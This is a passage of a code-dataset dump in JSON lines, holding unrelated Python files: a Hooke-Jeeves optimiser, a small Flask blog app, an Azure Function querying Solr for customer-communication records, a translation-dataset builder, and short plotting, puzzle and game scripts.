\")\n if (command != \"n\"):\n task = 1\n else:\n if self.accuracy < 0:\n print(\"Please enter positive number!\")\n task = 0\n self.epsilon = 10 ** (-self.accuracy)\n self.h = self.epsilon\n\n def inputnewdata(self):\n self.expression.input_expr()\n self.expression.input_range()\n pass\n\n def dostaff(self):\n task = 0\n while (task != 1):\n print('')\n print(\"Hooke-Jeeves pattern search method\")\n print('')\n task = self.enterCommand()\n if task == 2:\n pass\n elif task == 3:\n pass\n elif task == 4:\n self.showHelp()\n elif task == 5:\n self.inputnewdata()\n elif task == 6:\n self.print_raw_data()\n elif task == 8:\n self.setaccuracy()\n elif task == 9:\n self.makedefault()\n elif task == 10:\n self.resolve()\n elif task == 11:\n self.printresult()\n\n elif task == 12:\n self.printresult_g()\n pass\n\n def print_raw_data(self):\n self.expression.show_expr()\n pass\n\n def resolve(self):\n xw = {\"x1\": 1, \"x2\": 1}\n xp = {\"x1\": 1, \"x2\": 1}\n xn = {\"x1\": 1, \"x2\": 1}\n i = 0\n chalt = False\n x = self.x_start\n dx = self.x_delta\n print('-')\n print(dx)\n self.collect_result(i, x, dx, self.expression.execute_d(x))\n print(self.result[\"x_delta\"][-1])\n\n xw = x.copy()\n fp = self.expression.execute_d(x)\n print(\"Before choose point\")\n xw = self.choose_point(x, dx, True)\n xw.pop(\"__builtins__\", None)\n print(xw)\n fw = self.expression.execute_d(xw)\n print(\"After choose point\")\n\n xn = x.copy()\n xp = x.copy()\n print(\"Before first while fw >fp?\", fw > fp)\n while fw > fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n if self.norm(dx) > self.epsilon[0]:\n xw = self.choose_point(x, dx, True)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n\n xn = xw.copy()\n xp = x.copy()\n fn = fw\n\n if not chalt:\n i += 1\n self.collect_result(i, xn, dx, fn)\n while not self.halting_check() and not chalt:\n print(\"i\", i)\n #fp = fw\n xp.pop(\"__builtins__\", None)\n xn.pop(\"__builtins__\", None)\n xw.pop(\"__builtins__\", None)\n\n print(\"xp: \", xp)\n print(\"fp: \", fp)\n\n print(\"xn: \", xn)\n print(\"fn: \", fn)\n\n print(\"Before 2TB - BT, xw:\", xw)\n xw = self.mul(xn, 2.0)\n xw = self.dif(xw, xp)\n print(\"After 2TB - BT, xw:\", xw)\n #xw = self.choose_point(self.dif(self.mul(xn, self.get_betta()), xn), dx, True)\n xw = self.choose_point(xw, dx, True)\n xw.pop(\"__builtins__\", None)\n print(\"xw: \", xw)\n\n fw = self.expression.execute_d(xw)\n print(\"fw\", fw)\n\n print(\"dx\", dx)\n\n print(\"Before second while fw >fp?\", fw > fp)\n if fw > fp and not chalt:\n wx = xp.copy()\n dx = self.mul(dx, self.get_alpha())\n print(\"dx\", dx)\n\n if self.norm(dx) > self.epsilon[0]:\n print(\"xp: \", xp)\n xw.pop(\"__builtins__\", None)\n print(\"Before choose, xw:\", xw)\n xw = self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n print(\"After choose, xw:\", xw)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n xw.pop(\"__builtins__\", None)\n\n fn = fw\n print(\"Are chalt false?\", chalt)\n print(\"After second while fn < fp?\", fn < fp)\n if fn < fp and not chalt:\n fp = fn\n xp = xn.copy()\n xp.pop(\"__builtins__\", None)\n xn = xw.copy()\n xn.pop(\"__builtins__\", None)\n elif fn >= fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n xw = self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n fw = self.expression.execute_d(xw)\n\n while fw > fp and not chalt:\n dx = self.mul(dx, self.get_alpha())\n if self.norm(dx) > self.epsilon[0]:\n xw = self.choose_point(xp, dx, True)\n xw.pop(\"__builtins__\", None)\n fw = self.expression.execute_d(xw)\n else:\n chalt = True\n\n if fn < fp and not chalt:\n xp = xn.copy()\n xp.pop(\"__builtins__\", None)\n xn = xw.copy()\n xn.pop(\"__builtins__\", None)\n fp = fn\n\n i += 1\n self.collect_result(i, xn, dx, fn)\n pass\n else:\n pass\n self.printresult()\n pass\n\n def halting_check(self):\n ansver = False\n if self.norm(self.dif(self.result[\"xk\"][-2], self.result[\"xk\"][-1])) / self.norm(self.result[\"xk\"][-2]) <= \\\n self.epsilon[0] and math.fabs((self.expression.execute_d(\n self.result[\"xk\"][-2]) - self.expression.execute_d(self.result[\"xk\"][-1])) / self.expression.execute_d(\n self.result[\"xk\"][-2])) <= self.epsilon[1]:\n ansver = True\n print(\"Halting check! - True\")\n else:\n ansver = False\n return ansver\n\n def get_alpha(self):\n return 0.5\n\n def get_betta(self):\n return 2.0\n\n def choose_point(self, x, dx, m):\n #print('')\n #print(\"Choose point---\")\n argument_x = [\n self.sum(x, dx),\n self.dif_part(self.sum_part(x, dx, \"x1\"), dx, \"x2\"),\n self.sum_part(self.dif_part(x, dx, \"x1\"), dx, \"x2\"),\n self.dif(x, dx)\n ]\n #print(argument_x)\n f = [self.expression.execute_d(xw) for xw in argument_x]\n #print(f)\n if m:\n r = argument_x[f.index(min(f))]\n else:\n r = argument_x[f.index(max(f))]\n #print(\"--end--\")\n return r\n\n def norm(self, v):\n s = 0.0\n v = v.copy()\n v.pop(\"__builtins__\", None)\n for item in v:\n s += math.pow(v[item], 2)\n return math.sqrt(s)\n\n def dif(self, v1, v2):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n for item in d:\n d[item] = v1[item] - v2[item]\n return d\n\n def dif_part(self, v1, v2, part):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n d[part] = v1[part] - v2[part]\n return d\n\n def sum(self, v1, v2):\n s = v1.copy()\n s.pop(\"__builtins__\", None)\n for item in s:\n s[item] = v1[item] + v2[item]\n return s\n\n def sum_part(self, v1, v2, part):\n d = v1.copy()\n d.pop(\"__builtins__\", None)\n d[part] = v1[part] + v2[part]\n return d\n\n def mul(self, v1, betta):\n v1 = v1.copy()\n v1.pop(\"__builtins__\", None)\n for item in v1:\n v1[item] *= betta\n return v1\n\n def collect_result(self, i, x, dx, f):\n x = x.copy()\n x.pop(\"__builtins__\", None)\n dx = dx.copy()\n dx.pop(\"__builtins__\", None)\n self.result[\"i\"].append(i)\n self.result[\"xk\"].append(x)\n self.result[\"x_delta\"].append(dx)\n self.result[\"fx\"].append(f)\n\n def printresult_g(self):\n pass\n\n def printresult(self):\n print(\"Result:\")\n for i in range(len(self.result[\"i\"])):\n print('')\n print(\"i:\", self.result[\"i\"][i])\n self.result[\"xk\"][i].pop(\"__builtins__\", None)\n print(\"x:\", self.result[\"xk\"][i])\n self.result[\"x_delta\"][i].pop(\"__builtins__\", None)\n print(\"dx:\", self.result[\"x_delta\"][i])\n print(\"f:\", self.result[\"fx\"][i])\n pass\n print(\"Result:\")","sub_path":"hooke_jeeves_pattern_search_old.py","file_name":"hooke_jeeves_pattern_search_old.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336418998","text":"from flask import *\nimport json\nimport os\nimport mekblog\n\n\n# initial\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\nmekblog.config.load('config.json')\nmekblog.db.connect()\nmekblog.tag.update()\nmekblog.tag.load()\n\n# user access page\n\n@app.route('/')\ndef index():\n\t# add tags\n\treturn render_template('index.html')\n\n@app.route('/archives')\ndef archive_index():\n\tif 'tag' in request.args:\n\t\topt = {'tag': request.args['tag']}\n\telse:\n\t\topt = {}\n\tarchive_list = mekblog.archive.list_all(opt)\n\ttag_list = mekblog.tag.get_list()\n\treturn render_template('archive-index.html', archive_list=archive_list, tag_list=tag_list, session=session)\n\n@app.route('/archives/')\ndef read_archive(small_title):\n\tarchive = mekblog.archive.list_one({'small-title': small_title})\n\tif archive == None:\n\t\tabort(404)\n\telse:\n\t\ttag_list = mekblog.tag.get_list()\n\t\treturn render_template('archive.html', archive=archive, tag_list=tag_list, session=session)\n\n# administrator access page\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'GET':\n\t\tif 'admin' in session:\n\t\t\treturn redirect(url_for('admin'))\n\t\telse:\n\t\t\treturn render_template('login.html')\n\telse:\n\t\tif 'username' in request.form and 'password' in request.form:\n\t\t\tif request.form['username'] == mekblog.config.setting.core.root.uid.get():\n\t\t\t\tif request.form['password'] == mekblog.config.setting.core.root.passwd.get():\n\t\t\t\t\tsession['admin'] = mekblog.config.setting.core.root.uid.get()\n\t\t\t\t\treturn redirect(url_for('admin'))\n\t\t\treturn render_template('info.html', msg=\"Wrong account or password\")\n\t\telse:\n\t\t\tabort(400)\n\n@app.route('/logout')\ndef logout():\n\tsession['admin'] = 'None'\n\tsession.pop('admin', None)\n\treturn redirect(url_for('index'))\n\n@app.route('/admin')\ndef admin():\n\tif 'admin' in session:\n\t\treturn render_template('admin.html', root_user=mekblog.config.setting.core.root.uid.get())\n\telse:\n\t\tabort(403)\n\n@app.route('/new-archive', methods=['GET', 'POST'])\ndef new_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif request.method == 'GET':\n\t\treturn render_template('new-archive.html')\n\telse:\n\t\t# TODO: forward: check script\n\t\t# TODO: forward: rich-text editor\n\t\tresult, msg = mekblog.archive.post({\n\t\t\t'title': request.form['title'],\n\t\t\t'small-title': request.form['small-title'],\n\t\t\t'content': request.form['content'],\n\t\t\t'tag': request.form['tag']\n\t\t})\n\t\t# TODO: make error & alert page unified\n\t\tif not result:\n\t\t\treturn render_template('info.html', msg=msg)\n\t\telse:\n\t\t\treturn redirect(url_for('archive_index'))\n\n@app.route('/edit-archive', methods=['GET', 'POST'])\ndef edit_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif request.method == 'GET':\n\t\tif 'st' not in request.args:\n\t\t\tabort(404)\n\t\tarchive = mekblog.archive.list_one({'small-title': request.args['st']})\n\t\tif archive == None:\n\t\t\tabort(404)\n\t\treturn render_template('edit-archive.html', archive=archive)\n\tif request.method == 'POST':\n\t\tresult, msg = mekblog.archive.update({\n\t\t\t'title': request.form['title'],\n\t\t\t'small-title': request.form['small-title'],\n\t\t\t'content': request.form['content'],\n\t\t\t'tag': request.form['tag']\n\t\t})\n\t\tif not result:\n\t\t\treturn render_template('info.html', msg=msg)\n\t\telse:\n\t\t\t# TODO: improve tag function\n\t\t\treturn redirect(url_for('read_archive', small_title=request.form['small-title']))\n\n@app.route('/remove-archive')\ndef remove_archive():\n\tif 'admin' not in session:\n\t\tabort(403)\n\tif 'st' not in request.args:\n\t\tabort(404)\n\tmekblog.archive.remove({'small-title': request.args['st']})\n#\tmekblog.comment.remove(request.args['st'])\n\treturn redirect(url_for('archive_index'))\n\n# TODO: ajax access page\n\n@app.route('/comment/post', methods=['POST'])\ndef post_comment():\n\tindata = request.json\n\tmsg = mekblog.comment.post(indata)\n\treturn jsonify(msg), msg['code']\n\n@app.route('/comment/list')\ndef get_comment():\n\tif 'st'not in request.args:\n\t\tabort(400)\n\tcmt = mekblog.comment.list_by_archive(request.args['st'])\n\treturn render_template('comment.piece.html', cmt_list=cmt)\n\n@app.route(\"/settings\", methods=[\"GET\",\"POST\"])\ndef adminpanel():\n\tif \"admin\" not in session:\n\t\tabort(403)\n\tif request.method == \"GET\":\n\t\tdata = dict(mekblog.config.setting.core.root.get().items() + mekblog.config.setting.archive.get().items() + mekblog.config.setting.email.get().items())\n\t\treturn render_template(\"adminpanel.html\", data=data)\n\telse:\n\t\tf = mekblog.config.setting.core.root\n\t\tform = dict(request.form)\n\t\t# return str(form)\n\t\t# TODO: config object's views function\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tf = mekblog.config.setting.archive\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tf = mekblog.config.setting.email\n\t\tfor i in f.get().items():\n\t\t\tf.cd(i[0]).set(form[i[0]][0])\n\t\tmekblog.config.save(\"config.json\")\n\t\tdata = dict(mekblog.config.setting.core.root.get().items() + mekblog.config.setting.archive.get().items() + mekblog.config.setting.email.get().items())\n\t\tsignal = {\"after-post\":1}\n\t\treturn render_template(\"adminpanel.html\", data=data, signal=signal)\n\t\t# json\n\t\t\n\n# run as __main__\n\nif __name__ == '__main__':\n\tapp.run(debug=True,host='127.0.0.1',port=5000)\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535780900","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 17 13:31:48 2020\n\n@author: qtckp\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ny = np.random.rand(10,4)\ny[:,0]= np.arange(10)\ndf = pd.DataFrame(y, columns=[\"X\", \"A\", \"B\", \"C\"])\n\ndf['B'] = df['B'] + df['A']\n\nax = df.plot(x=\"X\", y=\"B\", kind=\"bar\")\ndf.plot(x=\"X\", y=\"A\", kind=\"bar\", ax=ax, color=\"C2\")\n\n\nplt.show()\n\n\n\n\n","sub_path":"old_data/bars2.py","file_name":"bars2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"317334504","text":"import sys\nfrom collections import deque\n\nN, K = map(int, sys.stdin.readline().split())\npeople = deque(i+1 for i in range(N))\ntemp = deque()\nans = []\n\nwhile len(ans) != N:\n k = K\n while k > len(people):\n k -= len(people)\n\n #print(people)\n for i in range(k-1):\n temp.append(people.popleft())\n \n ans.append(people.popleft())\n\n while len(temp) > 0:\n people.append(temp.popleft())\n\nprint('<', end='')\nprint(*ans, sep=', ', end='')\nprint('>')\n\n'''\n입력 예시\n7 3\n\n7 6\n\n출력 예시\n<3, 6, 2, 7, 5, 1, 4>\n<6, 5, 7, 2, 1, 4, 3>\n'''","sub_path":"11000~11999/Q11866.py","file_name":"Q11866.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"100483463","text":"import logging\nimport json\nimport azure.functions as func\nimport pandas as pd\nimport os \nimport pysolr\nimport datetime\nfrom __app__.shared_code import settings as config\nfrom __app__.shared_code import helper\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n try:\n logging.info('postCustomerCommunication function processing a request.')\n result=[]\n req_body = req.get_json()\n found_data = get_customer_communication_details(req_body[0])\n result = json.dumps(found_data)\n except Exception as e:\n logging.error(str(e))\n return func.HttpResponse(result,mimetype=\"application/json\")\n\ndef get_customer_communication_details(req_body):\n try:\n all_details_json,spec_list,material_list = helper.construct_common_level_json(req_body)\n sub_category=req_body.get(\"Category_details\").get(\"Subcategory\")\n json_list=[]\n if sub_category in config.customer_communication_category:\n category=config.customer_communication_category.get(sub_category)\n communication_query=helper.unstructure_template(all_details_json,category)\n params={\"fl\":config.unstructure_column_str}\n unstructure_values,unstructure_df=helper.get_data_from_core(config.solr_unstructure_data,communication_query,params) \n if len(unstructure_values)>0:\n count=0\n for item in unstructure_values:\n try:\n json_make={}\n datastr={}\n datastr=json.loads(item.get(\"DATA_EXTRACT\",{}))\n result_spec=item.get(\"SPEC_ID\")\n product=item.get(\"PRODUCT\",config.hypen_delimiter)\n product_type=item.get(\"PRODUCT_TYPE\",config.hypen_delimiter)\n spec_id=helper.finding_spec_details(spec_list,result_spec) \n if (sub_category in [\"US FDA Letter\",\"EU Food Contact\"]):\n path=str(datastr.get(\"file_path\",config.hypen_delimiter)).strip()\n if (path.lower().endswith(\"pdf\")):\n file_split=path.split(\"/\")\n file_source=''\n for source in config.file_sources:\n if source in file_split:\n file_source=source\n break\n count+=1\n extract_field={}\n for efield in datastr:\n if efield not in config.otherfields:\n extract_field[efield]=datastr.get(efield,config.hypen_delimiter)\n json_make[\"Extract_Field\"]=extract_field\n filename=datastr.get(\"file_name\",config.hypen_delimiter) \n date=datastr.get(\"Date\",config.hypen_delimiter)\n json_make[\"spec_Id\"]=spec_id\n json_make[\"fileName\"]=filename\n json_make[\"file_Source\"]=file_source\n json_make[\"product_Type\"]=product_type\n json_make[\"productName\"]=product\n json_make[\"id\"]=count\n json_make[\"createdDate\"]=date\n path=helper.replace_char_in_url(path)\n json_make[\"url\"]=(config.blob_file_path)+path.replace(\"/dbfs/mnt/\",\"\")+(config.sas_token)\n json_list.append(json_make)\n elif sub_category==\"Heavy Metals content\":\n datastr=json.loads(datastr)\n path=datastr.get(\"file_path\",\"\")\n file_split=path.split(\"/\")\n file_source=''\n for source in config.file_sources:\n if source in file_split:\n file_source=source\n break\n json_make[\"spec_Id\"]=spec_id\n json_make[\"file_Source\"]=file_source\n json_make[\"product\"]=product\n json_make[\"product_Type\"]=product_type\n json_make[\"aka\"]=remove_nan(datastr.get(\"AKA\",config.hypen_delimiter))\n json_make[\"batch\"]=remove_nan(datastr.get(\"Batch #\",config.hypen_delimiter))\n json_make[\"sample\"]=remove_nan(datastr.get(\"Sample #\",config.hypen_delimiter))\n json_make[\"system\"]=remove_nan(datastr.get(\"System\",config.hypen_delimiter))\n json_make[\"date\"]=remove_nan(datastr.get(\"Date\",config.hypen_delimiter))\n json_make[\"aluminium_Al\"]=remove_nan(datastr.get(\"Aluminum (Al)\",config.hypen_delimiter))\n json_make[\"antimony_Sb\"]=remove_nan(datastr.get(\"Antimony (Sb)\",config.hypen_delimiter))\n json_make[\"arsenic_As\"]=remove_nan(datastr.get(\"Arsenic (As)\",config.hypen_delimiter))\n json_make[\"barium_Ba\"]=remove_nan(datastr.get(\"Barium (Ba)\",config.hypen_delimiter))\n json_make[\"beryllium_Be\"]=remove_nan(datastr.get(\"Beryllium (Be)\",config.hypen_delimiter))\n json_make[\"boron_B\"]=remove_nan(datastr.get(\"Boron (B)\",config.hypen_delimiter))\n json_make[\"cadmium_Cd\"]=remove_nan(datastr.get(\"Cadmium (Cd)\",config.hypen_delimiter))\n json_make[\"calcium_Ca\"]=remove_nan(datastr.get(\"Calcium (Ca)\",config.hypen_delimiter))\n json_make[\"carbon\"]=remove_nan(datastr.get(\"Carbon\",config.hypen_delimiter))\n json_list.append(json_make)\n except Exception as e:\n pass \n # elif sub_category==\"Communication History\" and (\"case_Number\" not in req_body) and (\"selected_level\" in req_body):\n elif sub_category==\"Communication History\" and (\"case_Number\" not in req_body):\n logging.info(f'communication req body {req_body}')\n sfdc_query=helper.sfdc_template(all_details_json)\n params={\"fl\":config.sfdc_column_str}\n sfdc_values,sfdc_df=helper.get_data_from_core(config.solr_sfdc,sfdc_query,params) \n if len(sfdc_values)>0 and (\"CASENUMBER\" in list(sfdc_df.columns)):\n if len(sfdc_df.columns)!=len(config.sfdc_column):\n dummy=pd.DataFrame([],columns=config.sfdc_column)\n sfdc_df=pd.concat([sfdc_df,dummy])\n case_df=sfdc_df[config.sfdc_case_call]\n case_df.drop_duplicates(inplace=True)\n case_df=case_df.fillna(config.hypen_delimiter)\n case_df=case_df.replace({\"NULL\":\"-\"})\n for index, row in case_df.iterrows():\n json_make={}\n json_make[\"case_Number\"]=row[\"CASENUMBER\"]\n json_make[\"manufacturing_Plant\"]=row[\"MANUFACTURINGPLANT\"]\n json_make[\"customer_Name\"]=row[\"ACCOUNTNAME\"]\n json_make[\"key\"]=row[\"MATCHEDPRODUCTVALUE\"]\n json_make[\"product_Type\"]=row[\"MATCHEDPRODUCTCATEGORY\"]\n json_make[\"topic\"]=row[\"REASON\"]\n json_make[\"tier_2_Owner\"]=row[\"SOP_TIER_2_OWNER_EMAIL_FORMULA__C\"]\n json_make[\"bu\"]=row[\"BU\"]\n json_list.append(json_make) \n elif sub_category==\"Communication History\" and (\"case_Number\" in req_body):\n selected_case=req_body.get(\"case_Number\")\n sfdc_query=helper.sfdc_template(all_details_json)\n sfdc_query = f'(CASENUMBER:{selected_case}) && '+sfdc_query\n params={\"fl\":config.sfdc_email_call}\n sfdc_values,sfdc_df=helper.get_data_from_core(config.solr_sfdc,sfdc_query,params)\n for item in sfdc_values:\n json_make={}\n if item.get(\"CONTACTEMAIL\",config.hypen_delimiter)!=\"NULL\":\n json_make[\"contact_Email\"]=item.get(\"CONTACTEMAIL\",config.hypen_delimiter)\n else:\n json_make[\"contact_Email\"]=config.hypen_delimiter\n json_make[\"email_Content\"]=item.get(\"EMAILBODY\",config.hypen_delimiter)\n json_make[\"email_Subject\"]=item.get(\"EMAILSUBJECT\",\"\")\n attachment=str(item.get(\"EMAILATTACHMENT\",\"\"))\n attachment_split=attachment.split(\"|:|\")\n add_doc=[]\n for att in attachment_split:\n if att!=\"NULL\" and att!='' and att!=\"Not Found\":\n path=att.split(\"/\")\n filename=(att[1:])\n # filename=(att[1:]).replace(\"?\",\"%3F\")\n filename=helper.replace_char_in_url(filename)\n file=(config.blob_file_path)+filename+(config.sas_token)\n add_doc.append({\"name\":path[-1],\"url\":file})\n json_make[\"attached_Docs\"]=add_doc\n json_list.append(json_make)\n return json_list\n except Exception as e:\n return json_list\n \ndef remove_nan(value):\n try:\n if value.strip().lower()==\"nan\" or value.strip()==\"\":\n return config.hypen_delimiter\n else:\n return value\n except Exception as e:\n return value\n","sub_path":"postCustomerCommunication/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140756274","text":"from ilmulti.dataset import MonolingualDataset, ParallelDataset, MultilingualDataset\nfrom ilmulti.dataset.torch import TensorParallelDataset\nfrom ilmulti.dataset import AgnosticTokenizedDataset\nfrom ilmulti.filters import PairDetect\nfrom ilmulti.sentencepiece import SentencePieceTokenizer\nfrom ilmulti.dataset.torch import TensorMultiDataset\nimport os\nfrom ilmulti.dataset import ParallelWriter\nfrom ilmulti.dataset import FakeParallelDataset\nfrom ilmulti.utils import canonicalize\nfrom tqdm import tqdm, trange\n\n# Create tokenizer\n\ntokenizer = SentencePieceTokenizer()\n# exit()\n\n# Declare datasets\nmininterval = 100\nfrom argparse import ArgumentParser\nparser = ArgumentParser()\nparser.add_argument('--lang', required=True, type=str)\nparser.add_argument('--output', required=True, type=str)\nargs = parser.parse_args()\n\nif not os.path.exists(args.output):\n os.makedirs(args.output)\n\ndictionary = tokenizer.dictionary()\ndictionary.save(os.path.join(args.output, \"vocab.dict\"))\n\n# def dfilter(sset, ext):\n# ls = []\n# for dataset in sset:\n# # if canonicalize(ext) in dataset.exts:\n# # print(dataset, canonicalize(ext) == dataset.exts[1])\n# if canonicalize(ext) == dataset.exts[1]:\n# ls.append(dataset)\n# return set(ls)\n# \n# \nclass Collector(set):\n def __init__(self, *args, **kwargs):\n super().__init__(self, *args, **kwargs)\n\n def add(self, pset):\n super().add(pset)\n if not pset.is_mono():\n pass\n first, second = pset.get_mono_as_parallel()\n super().add(first)\n super().add(second)\n\npairs = Collector()\n\ndef augmented(prefix, exts):\n src, tgt = exts\n return [\n ParallelDataset(prefix, (src, tgt)),\n ParallelDataset(prefix, (tgt, src)),\n ]\n# \n# root = '/Neutron5/jerin/consolidation/parallel/ilci/'\n# required = ['bg', 'en', 'hi', 'ml', 'ta', 'te', 'ud']\n# n = len(required)\n# for i in range(n):\n# for j in range(i+1, n):\n# exts = (required[i], required[j])\n# prefix = os.path.join(root, 'complete')\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# \n# # 2: OpenSubs: OPUS\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'train')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# # 3: National Dataset\n# root = '/Neutron5/jerin/consolidation/parallel/national'\n# prefix = os.path.join(root, 'national')\n# exts = ('en', 'hi')\n# # parallel = ParallelDataset(prefix, exts)\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\n\n# 4: Monolingual Available\n## Malayalam \n# root = '/Neutron5/jerin/malayalam-data/'\n# prefix = os.path.join(root, 'all')\n# ext = 'ml'\n# parallel = FakeParallelDataset(prefix, ext)\n# pairs.add(parallel)\n\n# # 5: IIT-Bombay\n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# _dir = ''.format(lang)\n# prefix = os.path.join(root, 'train')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\n# print(\"Filtering!\")\n# pairs = dfilter(pairs, args.lang)\n# for pair in pairs:\n# print(pair)\n# dataset = TensorMultiDataset(pairs, tokenizer)\n# writer = ParallelWriter(args.output, 'train', 'src', 'tgt')\n# for i in trange(len(dataset)):\n# src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n# \n# src_lang_token, *src_tokens = src_tokens\n# tgt_lang_token, *tgt_tokens = tgt_tokens\n# src_tokens = [tgt_lang_token] + src_tokens\n# \n# f = lambda x: ' '.join(x)\n# source_sentence = f(src_tokens)\n# target_sentence = f(tgt_tokens)\n# writer.write(source_sentence, target_sentence)\n\n# Dev Dataset\n# -----------------------------------------------------\n# \n# pairs = Collector()\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'dev')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# _dir = ''.format(lang)\n# prefix = os.path.join(root, 'dev')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# # \n# # # multi = AgnosticTokenizedDataset(pairs, tokenizer)\n# pairs = dfilter(pairs, args.lang)\n# dataset = TensorMultiDataset(pairs, tokenizer)\n# writer = ParallelWriter(args.output, 'dev', 'src', 'tgt')\n# for i in trange(len(dataset), mininterval=mininterval):\n# src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n# \n# src_lang_token, *src_tokens = src_tokens\n# tgt_lang_token, *tgt_tokens = tgt_tokens\n# src_tokens = [tgt_lang_token] + src_tokens\n# \n# f = lambda x: ' '.join(x)\n# source_sentence = f(src_tokens)\n# target_sentence = f(tgt_tokens)\n# writer.write(source_sentence, target_sentence)\n\n# Test Dataset\n# -----------------------------------------------------\n\n# pairs = Collector()\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# \n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'test')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\npairs = Collector()\nroot = '/Neutron5/jerin/consolidation/parallel/wat-normalized'\nlangs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n\nfor lang in langs:\n _dir = '{}-en'.format(lang)\n prefix = os.path.join(root, _dir, 'test')\n exts = ('en', lang)\n parallels = augmented(prefix, exts)\n # parallel = ParallelDataset(prefix, exts)\n for parallel in parallels:\n pairs.add(parallel)\n\n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# # _dir = ''.format(lang)\n# prefix = os.path.join(root, 'test')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# print(parallel)\n# pairs.add(parallel)\n\n# pairs = dfilter(pairs, args.lang)\ndataset = TensorMultiDataset(pairs, tokenizer)\nwriter = ParallelWriter(args.output, 'test', 'src', 'tgt')\nmapping_fname = os.path.join(args.output, \"test_lang.mapping\")\nmapping = open(mapping_fname, 'w+')\nfor i in trange(len(dataset), mininterval=mininterval):\n src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n src_lang_token, *src_tokens = src_tokens\n tgt_lang_token, *tgt_tokens = tgt_tokens\n src_tokens = [tgt_lang_token] + src_tokens\n f = lambda x: ' '.join(x)\n source_sentence = f(src_tokens)\n target_sentence = f(tgt_tokens)\n writer.write(source_sentence, target_sentence)\n print(' '.join([str(i), src_lang_token, tgt_lang_token]), file=mapping)\n","sub_path":"ilmulti/test_scripts/torch_datasets.py","file_name":"torch_datasets.py","file_ext":"py","file_size_in_byte":7389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599201150","text":"from pico2d import*\n\nKPU_WIDTH, KPU_HEIGHT = 1280, 1024\n\ndef handle_events():\n\tglobal running\n\tglobal x, y\n\tevents = get_events()\n\tfor event in events:\n\t\tif event.type == SDL_QUIT:\n\t\t\trunning = False\n\t\telif event.type == SDL_MOUSEMOTION:\n\t\t\tx, y = event.x, KPU_HEIGHT - 1 - event.y\n\t\telif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n\t\t\trunning = False\n\nopen_canvas(KPU_WIDTH, KPU_HEIGHT)\nkpu_ground = load_image('grass.png')\ncharacter = load_image('run_animation.png')\n\nrunning = True\nx = 800 // 2\nframe = 0\ndir = 0\n\nwhile 